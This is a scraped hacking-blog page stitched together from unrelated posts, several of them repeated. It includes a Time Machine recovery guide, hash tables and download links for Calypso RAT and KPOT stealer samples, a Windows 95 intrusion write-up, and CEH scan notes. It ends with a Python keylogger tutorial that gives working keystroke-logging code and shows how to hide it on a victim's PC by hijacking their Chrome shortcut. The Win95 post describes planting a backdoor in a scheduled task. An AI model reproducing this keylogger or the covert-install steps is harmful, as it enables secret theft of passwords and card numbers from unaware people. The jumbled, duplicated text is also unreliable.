- Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
- Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
- Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
- KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
- Phrack Magazine: Digital hacking magazine.
- NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
- SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
- Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
- The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
- SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
- HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
- Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
How To Install And Config Modlishka Tool - Most Advance Reverse Proxy Phishing
Related word
- Pentest Software
- Pentest Android App
- Pentest Tools Github
- Pentest Online Course
- Hacking Google
- Hacking Box
- Hacker Computer
- Pentest Lab Setup
- Hacker Typer
- Hacking Vpn
- Hacking Script
- Pentest Cheat Sheet
- Pentest With Kali
- Pentest Red Team
- Basic Pentest 1 Walkthrough
- Hacker Code
- Hacker News
- Pentest Smtp
Recovering Data From An Old Encrypted Time Machine Backup
Recovering data from a backup should be an easy thing to do. At least this is what you expect. Yesterday I had a problem which should have been easy to solve, but it was not. I hope this blog post can help others who face the same problem.
2. This backup was not on an official Apple Time Capsule or on a USB HDD, but on a WD MyCloud NAS
3. I needed files from this backup
4. After running out of time I only had SSH access to the macOS, no GUI
As always, I started to Google what shall I do. One of the first options recommended that I add the backup disk to Time Machine, and it will automagically show the backup snapshots from the old backup. Instead of this, it did not show the old snapshots but started to create a new backup. Panic button has been pressed, backup canceled, back to Google.
Other tutorials recommend to click on the Time Machine icon and pressing alt (Option) key, where I can choose "Browse other backup disks". But this did not list the old Time Machine backup. It did list the backup when selecting disks in Time Machine preferences, but I already tried and failed that way.
YAT (yet another tutorial) recommended to SSH into the NAS, and browse the backup disk, as it is just a simple directory where I can see all the files. But all the files inside where just a bunch of nonsense, no real directory structure.
YAT (yet another tutorial) recommended that I can just easily browse the content of the backup from the Finder by double-clicking on the sparse bundle file. After clicking on it, I can see the disk image on the left part of the Finder, attached as a new disk.
Well, this is true, but because of some bug, when you connect to the Time Capsule, you don't see the sparse bundle file. And I got inconsistent results, for the WD NAS, double-clicking on the sparse bundle did nothing. For the Time Capsule, it did work.
At this point, I had to leave the location where the backup was present, and I only had remote SSH access. You know, if you can't solve a problem, let's complicate things by restrict yourself in solutions.
Finally, I tried to check out some data forensics blogs, and besides some expensive tools, I could find the solution.
The best part of hdiutil is that you can provide the read-only flag to it. This can be very awesome when it comes to forensics acquisition.
To mount any NAS via SMB:
To mount a Time Capsule share via AFP:
And finally this command should do the job:
It is nice that you can provide read-only parameter.
If the backup was encrypted and you don't want to provide the password in a password prompt, use the following:
Note: if you receive the error "resource temporarily unavailable", probably another machine is backing up to the device
And now, you can find your backup disk under /Volumes. Happy restoring!
Probably it would have been quicker to either enable the remote GUI, or to physically travel to the system and login locally, but that would spoil the fun.
The problem
1. I had an encrypted Time Machine backup which was not used for months2. This backup was not on an official Apple Time Capsule or on a USB HDD, but on a WD MyCloud NAS
3. I needed files from this backup
4. After running out of time I only had SSH access to the macOS, no GUI
The struggle
By default, Time Machine is one of the best and easiest backup solution I have seen. As long as you stick to the default use case, where you have one active backup disk, life is pink and happy. But this was not my case.As always, I started to Google what shall I do. One of the first options recommended that I add the backup disk to Time Machine, and it will automagically show the backup snapshots from the old backup. Instead of this, it did not show the old snapshots but started to create a new backup. Panic button has been pressed, backup canceled, back to Google.
Other tutorials recommend to click on the Time Machine icon and pressing alt (Option) key, where I can choose "Browse other backup disks". But this did not list the old Time Machine backup. It did list the backup when selecting disks in Time Machine preferences, but I already tried and failed that way.
YAT (yet another tutorial) recommended to SSH into the NAS, and browse the backup disk, as it is just a simple directory where I can see all the files. But all the files inside where just a bunch of nonsense, no real directory structure.
YAT (yet another tutorial) recommended that I can just easily browse the content of the backup from the Finder by double-clicking on the sparse bundle file. After clicking on it, I can see the disk image on the left part of the Finder, attached as a new disk.
Well, this is true, but because of some bug, when you connect to the Time Capsule, you don't see the sparse bundle file. And I got inconsistent results, for the WD NAS, double-clicking on the sparse bundle did nothing. For the Time Capsule, it did work.
At this point, I had to leave the location where the backup was present, and I only had remote SSH access. You know, if you can't solve a problem, let's complicate things by restrict yourself in solutions.
Finally, I tried to check out some data forensics blogs, and besides some expensive tools, I could find the solution.
The solution
Finally, a blog post provided the real solution - hdiutil.The best part of hdiutil is that you can provide the read-only flag to it. This can be very awesome when it comes to forensics acquisition.
To mount any NAS via SMB:
mount_smbfs afp://<username>@<NAS_IP>/<Share_for_backup> /<mountpoint>
To mount a Time Capsule share via AFP:
mount_afp afp://any_username:password@<Time_Capsule_IP>/<Share_for_backup> /<mountpoint>
And finally this command should do the job:
hdiutil attach test.sparsebundle -readonly
It is nice that you can provide read-only parameter.
If the backup was encrypted and you don't want to provide the password in a password prompt, use the following:
printf '%s' 'CorrectHorseBatteryStaple' | hdiutil attach test.sparsebundle -stdinpass -readonly
Note: if you receive the error "resource temporarily unavailable", probably another machine is backing up to the device
And now, you can find your backup disk under /Volumes. Happy restoring!
Probably it would have been quicker to either enable the remote GUI, or to physically travel to the system and login locally, but that would spoil the fun.
Continue reading
APT Calypso RAT, Flying Dutchman Samples
Reference
Attackers exploit Windows SMB vulnerability CVE-2017-0143 or use stolen credentials to gain access, deploy the custom Calypso RAT and use it to upload other tools such as Mimikatz, EternalBlue and EternalRomance. They move laterally and steal data.
Download
Hashes
MD5 | SHA256 | SHA1 | Filename | File Tyee | Stage |
---|---|---|---|---|---|
aa1cf5791a60d56f7ae6da9bb1e7f01e | d5afa3bfd423ba060207ad025467feaa56ac53d13616ac8782a7f63c9fc0fdb4 | bdd8b9115d1ae536d0ea1e62052485e5ad10761f | MPSSVC.dll | pe dll | Calypso RAT Payload |
1e765fed294a7ad082169819c95d2c85 | f6a09372156a8aef96576627a1ed9e57f194b008bb77e32ca29ac89505f933f0 | 60dda7ccd9ae00701046923b619a1b9c33c8e2ac | Wscntfy.exe | pe exe | Calypso RAT Dropper |
17e05041730dcd0732e5b296db16d757 | b6c21c26aef75ad709f6c9cfa84bfa15b7ee709588382ce4bc3544a04bceb661 | f3301405d8ad5b160747241d6b2a8d88bf6292e8 | pe exe | Calypso RAT Dropper | |
1ed72c14c4aab3b66e830e16ef90b37b | eebff21def49af4e85c26523af2ad659125a07a09db50ac06bd3746483c89f9d | dc0d0a34f107d140d9e47582e17a7fec945403ea | coal.exe | pe exe | Calypso RAT Dropper |
e24a62d9826869bc4817366800a8805c | c407c3dde18c9b56ed24492ca257d77a570616074356b8c7854a080823f7ee17 | 53791c9e7c41931a6becb999fee4eb7daf9b1a11 | data01.bin | pe dll | Calypso RAT Dropper |
c9c39045fa14e94618dd631044053824 | ab39301d45045172ad41c9a89210fdc6f0d3f9dccb567fd733b0dbffbfcfbcc3 | 1cda28bc307c09508dbb1f3495a967bbcc29326e | pe exe | Calypso RAT Dropper | |
69322703b8ef9d490a20033684c28493 | e6a3b43acdaa824f3280095b10798ea341839f7d43f0460df8989f13c98fa6e0 | f203680d97705d99f92fe9797691be6177f5fd41 | RasCon.dll | pe dll | Calypso RAT Dropper |
85ce60b365edf4beebbdd85cc971e84d | 5dfdee5dd680948d19ab4d16df534cf10aca5fa0b157c59659d6517fe897c62f | d9c14f7b6de8e26ae33e41a72ae8e35bb1af4434 | pe exe | Calypso RAT Dropper | |
6347e42f49a86aff2dea7c8bf455a52a | 281583aca23f8fd8745dd88a600cbfc578d819859a13957ec022b86c3c1c99f4 | 8b2a81af85590e0e36efc1c05aa4f0600ea21545 | HIDMgr.dll | pe dll | Calypso RAT Dropper |
cb914fc73c67b325f948dd1bf97f5733 | 0031c7b63c1e1cd36d55f585d97e2b21a13a19858d5a1aa5455e5cc64b41e6e9 | 37ce4d0a3168e3b2f80b3fae38082e68a454aee0 | pe exe | Calypso RAT Dropper | |
c84df4b2cd0d3e7729210f15112da7ac | 4e8351ddaff18f7df6fcc27a3c75598e0c56d3b406818d45effb4e78616092c2 | 41a0c5a1aad36f405c8755613c732591e3300f97 | mscorsvw.dll | pe dll | Calypso RAT Dropper |
5199ef9d086c97732d97eddef56591ec | 511683c8ee62478c2b45be1f782ce678bbe03c4349a1778651414803010b3ee9 | d19a786adc09dff84642f2c2e0386193fa2a914b | dnscache.dll | pe dll | FlyingDutchman |
06c1d7bf234ce99bb14639c194b3b318 | a9a82099aa812d0c4025bee2b34f3b34c1d102773e36f1d50648815913dbe03d | 464ab9e11d371bf24de46c98c295d4afe7e957c1 | fromResource.exe | pedll | FlyingDutchman |
617d588eccd942f243ffa8cb13679d9c | 0664b09a86ec2df7dfe01a93e184a1fa23df66ea82cab39000944e418ec1f7b2 | 1b043fdcb582ed13cbf7dabcef6527762b5be93c | pe dll | Hussar | |
2807236c2d905a0675878e530ed8b1f8 | 314e438198f8cc2ee393c75f8e9f2ebd2b5133fd6f2b7deb1178f82782fc6330 | 2f6fe857632a67e87f4f3631bfa93713ccdf168a | AeLookupMgr.dll | pe dll | Calypso RAT Payload |
cce8c8ee42feaed68e9623185c3f7fe4 | 38cc404437b936660066b71cc87a28af1995248d6d4c471706eb1dd347129b4b | 9d2235c911b86bb6ad55d953a2f56ea78c5478e5 | AppCert.dll.crt | Calypso RAT Payload | |
e1a578a069b1910a25c95e2d9450c710 | 413622ded5d344a5a78de4fea22cfdabdeb4cdccf69e9a1f58f668096c324738 | 36087a5b0809dc3f9dc5a77355a88e99af491a88 | RasCfgMan.dll.crt | Calypso RAT Payload | |
0d532484193b8b098d7eb14319cefcd3 | f8043d6bfc3e63d8561f7f74e65cb7ff1731577ecf6c7559795d9de21298f0fc | 31f4c6dc6ce78b4e0439b30c830dfd5d9a3fc4fe | RasCfgMan.dll | pe dll | Calypso RAT Payload |
974298eb7e2adfa019cae4d1a927ab07 | 0461710e681fd6dc9f1c83b57f94a88cd6df9e6432174cbfdd70dfd24577a0f8 | 41bc37679ce3caeecc176d10b4f8259918e25807 | VirtualUMP.dll.crt | Calypso RAT Payload | |
05f472a9d926f4c8a0a372e1a7193998 | 8017923cd8169bf951106f053408b425f1eb310a9421685638ead55bb3823db3 | 8d909bd3450ebe0cffd0cb17b91bc28d23ef5083 | EFSProvider.dll.crt | Calypso RAT Payload | |
d1a1166bec950c75b65fdc7361dcdc63 | f3f38c097b0cc5337b7d2dbec098bf6d0a3bb4a3e0336e7b1c8af75268a0a49d | 5731350f68a74fb4762c4ea878ecff635588a825 | RasCon.dll | pe dll 64bits assembly | Calypso RAT Payload |
e3e61f30f8a39cd7aa25149d0f8af5ef | c4dc7519bccc24c53794bf9178e4a4d0823875c34479d01cedbb3e9b10f5c730 | 1b75ea494c3ac171c5177bdcc263b89a3f24f207 | MPSSVC.dll | pe dll | Calypso RAT Payload |
Hacking Windows 95, Part 2
In the Hacking Windows 95, part 1 blog post, we covered that through a nasty bug affecting Windows 95/98/ME, the share password can be guessed in no time. In this article, I'm going to try to use this vulnerability to achieve remote code execution (with the help of publicly available tools only).
The first thing we can do when we have read access to the Windows directory through the share, is to locate all the *.pwl files on the c:\windows directory, copy them to your machine where Cain is installed, switch to Cracker tab, pwl files, load the pwl file, add username based on the filename, and try to crack it. If you can't crack it you might still try to add a .pwl file where you already know the password in the remote windows directory. Although this is a fun post-exploitation task, but still, no remote code execution. These passwords are useless without physical access.
The first thing we can do when we have read access to the Windows directory through the share, is to locate all the *.pwl files on the c:\windows directory, copy them to your machine where Cain is installed, switch to Cracker tab, pwl files, load the pwl file, add username based on the filename, and try to crack it. If you can't crack it you might still try to add a .pwl file where you already know the password in the remote windows directory. Although this is a fun post-exploitation task, but still, no remote code execution. These passwords are useless without physical access.
One might think that after having a share password and user password, it is easy to achieve remote code execution. The problem is:
- there is no "at" command (available since Windows 95 plus!)
- there is no admin share
- there is no RPC
- there is no named pipes
- there is no remote registry
- there is no remote service management
If you think about security best practices, disabling unnecessary services is always the first task you should do. Because Windows 95 lacks all of these services, it is pretty much secure!
During my quest for a tool to hack Windows 95, I came across some pretty cool stuff:
During my quest for a tool to hack Windows 95, I came across some pretty cool stuff:
LanSpy
But the best of the best is Fluxay, which has been written by chinese hackers. It is the metasploit from the year 2000. A screenshot is worth more than a 1000 words. 4 screenshot > 4 thousand words :)
But the best of the best is Fluxay, which has been written by chinese hackers. It is the metasploit from the year 2000. A screenshot is worth more than a 1000 words. 4 screenshot > 4 thousand words :)
It is pretty hard to find the installer, but it is still out there!
But at the end, no remote code execution for me.
But at the end, no remote code execution for me.
My idea here was that if I can find a file which executes regularly (on a scheduled basis), I can change that executable to my backdoor and I'm done. Although there is no scheduler in the default Windows 95, I gave it a try.
Let's fire up taskman.exe to get an idea what processes are running:
Looks like we need a more powerful tool here, namely Process Explorer. Let's try to download this from oldapps.com:
LOL, IE3 hangs, can't render the page. Copying files to the Win95 VM is not that simple, because there are no shared folders in Win95 VM. And you can't use pendrives either, Win95 can't handle USB (at least the retail version). After downloading the application with a newer browser from oldapps, let's start Process Explorer on the test Windows 95.
Don't try to download the Winsocks 2 patch from the official MS site, it is not there anymore, but you can download it from other sites.
Now let's look at the processes running:
After staring it for minutes, turned out it is constant, no new processes appeared.
Looking at the next screenshot, one can notice this OS was not running a lot of background processes ...
After staring it for minutes, turned out it is constant, no new processes appeared.
Looking at the next screenshot, one can notice this OS was not running a lot of background processes ...
My current Win7 has 1181 threads and 84 processes running, no wonder it is slow as hell :)
We have at least the following options:
- You are lucky and not the plain Windows 95 is installed, but Windows 95 Plus! The main difference here is that Windows 95 Plus! has built-in scheduler, especially the "at" command. Just overwrite a file which is scheduled to execution, and wait. Mission accomplished!
- Ping of death - you can crash the machine (no BSOD, just crash) with long (over 65535 bytes) ICMP ping commands, and wait for someone to reboot it. Just don't forget to put your backdoor on the share and add it to autoexec.bat before crashing it.
- If your target is a plain Windows 95, I believe you are out of luck. No at command, no named pipes, no admin share, nothing. Meybe you can try to fuzz port 137 138 139, and write an exploit for those. Might be even Ping of Death is exploitable?
Let's do the first option, and hack Windows 95 plus!
Look at the cool features we have by installing Win95 Plus!
Now we can replace diskalm.exe with our backdoor executable, and wait maximum one hour to be scheduled.
Instead of a boring text based tutorial, I created a YouTube video for you. Based on the feedbacks on my previous tutorialz, it turned out I'm way too old, and can't do interesting tutorials. That's why I analyzed the cool skiddie videoz, and found that I have to do the followings so my vidz won't suck anymore:
Related articlesCool new boot splash screen!
But our main interest is the new, scheduled tasks!
Now we can replace diskalm.exe with our backdoor executable, and wait maximum one hour to be scheduled.
Instead of a boring text based tutorial, I created a YouTube video for you. Based on the feedbacks on my previous tutorialz, it turned out I'm way too old, and can't do interesting tutorials. That's why I analyzed the cool skiddie videoz, and found that I have to do the followings so my vidz won't suck anymore:
- use cool black windows theme
- put meaningless performance monitor gadgets on the sidebar
- use a cool background, something related with hacking and skullz
- do as many opsec fails as possible
- instead of captions, use notepad with spelling errorz
- there is only one rule of metal: Play it fuckin' loud!!!!
KPOT Info Stealer Samples
KPOT Stealer is a "stealer" malware that focuses on stealing account information and other data from various software applications and services
References
1. 2020-04-19 Didier Stevens posted analysis of KPOT infostealer on the Infosec Handlers Diary blog "KPOT Analysis: Obtaining the Decrypted KPOT EXE"
These are samples to follow his analysis routine.
2. 2019-05-09 Proofpoint. New KPOT v2.0 stealer brings zero persistence and in-memory features to silently steal credentials
Download
1. http://contagio.deependresearch.org/crime/kpotstealer_win_samp.zip from Didier Stevens' post
2. http://contagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip - Proofpoint
Hashes
1. From Didier Stevens' post
MD5 56ad7b243511ee7398d43df7643dc904
SHA-1 ae5ab7798ca267b1265a0496c562f219821d17cf
SHA-256 3fd4aa339bdfee23684ff495d884aa842165e61af85fd09411abfd64b9780146
2. From Proofpoint
MD5 7d7667ddce8fd69a0fd50bb08c287d10
SHA-1 087fc3e9a082983ee6a2b25f0ccb09eb723e0f39
SHA-256 67f8302a2fd28d15f62d6d20d748bfe350334e5353cbdef112bd1f8231b5599d
MD5 45ddc687f88b45fc3fec79f9dc8b38e2
SHA-1 de37b748e0e32d96c31f469f9ba4ea4f11e3e78b
SHA-256 36dcd40aee6a42b8733ec3390501502824f570a23640c2c78a788805164f77cecontagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip
MD5 56ad7b243511ee7398d43df7643dc904
SHA-1 ae5ab7798ca267b1265a0496c562f219821d17cf
SHA-256 3fd4aa339bdfee23684ff495d884aa842165e61af85fd09411abfd64b9780146
2. From Proofpoint
MD5 7d7667ddce8fd69a0fd50bb08c287d10
SHA-1 087fc3e9a082983ee6a2b25f0ccb09eb723e0f39
SHA-256 67f8302a2fd28d15f62d6d20d748bfe350334e5353cbdef112bd1f8231b5599d
MD5 45ddc687f88b45fc3fec79f9dc8b38e2
SHA-1 de37b748e0e32d96c31f469f9ba4ea4f11e3e78b
SHA-256 36dcd40aee6a42b8733ec3390501502824f570a23640c2c78a788805164f77cecontagio.deependresearch.org/crime/kpotstealer(proofpoint)_win_samp.zip
- Pentest Network
- Pentesterlab
- Hacking Apps
- Pentest Report Generator
- Pentest App
- Pentest Ubuntu
- Hacking 3Ds
- Pentest Companies
- Pentestlab
- Hacking Youtube
- Pentest Bootcamp
- Pentest Online Course
- Pentest With Kali
- Pentest Practice
- Pentest Companies
- Hacking Hardware
- Pentest Linux
- How To Pentest A Network
- Hacking
CEH: Gathering Network And Host Information, Types Of Scan
In Hacking the main focus is over gathering the information about victim or victim's machine. Which will help to find out which type of exploit will works according to the given circumstances. Gathering the network and host information means to find out by which network, the which victim's machine is connected and communicating over the network. Moreover, scanning is also performed for gathering information about open and closed ports. After that they'll able to find the vulnerabilities in the target system and try to get access to the system.
Types Of Scan
As a CEH you should know the scan types and uses:SYN
SYN scan doesn't complete the TCP three way handshake that is why it is known as a half-open scan. An attacker send a SYN packet to the victim machine if SYN/ACK packet is received back to attacker, then it clarify that the port is listening due to the acknowledgment by the victim that it has completed the connection. While if the attacker is received the RST/ACK packet then it assumed that the port is closed or open.XMAS
XMAS scan works only on target system that has the RFC 793 development of TCP/IP and it doesn't works against any version of windows.XMAS scan send a packet with by setting up the FIN, URG and PSH flags of the TCP header. The function of this scan is if the port is active there will be no response but if the port is closed the target responds with a RST/ACK packet.
FIN
A FIN scan send a packet by setting up only the FIN flag of the TCP. This scan is similar to XMAS scan. FIN scan receives no response if the port is active while if the port is closed it receives the RST/ACK packet.NULL
NULL scan is also similar to the XMAS scan. But the only difference is that it sends a packet without setting up the any flag of TCP header. NULL scan receives no response if the port is open but if the port is closed it receives the RST/ACK packet.IDLE
It is just like spoofing an IP address by sending a SYN packet to the victim's machine to find out which services are available over the system. This scan is completed with the help of another system called as "Zombie" (that is not receiving or transmitting any information).Related posts
How To Make A Simple And Powerful Keylogger Using Python
A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.
How to make a python keylogger?
A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
- Computer With Operating system: Windows, Mac os or Linux
- Python must be installed on the system
- Pip (Python index package ) you will need this to install python software packages.
- Pypiwin32 and PyHook packages
- Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.
Python Keylogger source code:
Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, loggingfile_log='F:\\test\\log.txt'def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return Truehooks_manager=pyHook.HookManager()hooks_manager.KeyDown=onKeyboardEventhooks_manager.HookKeyboard()pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
More articles
Subscribe to:
Posts (Atom)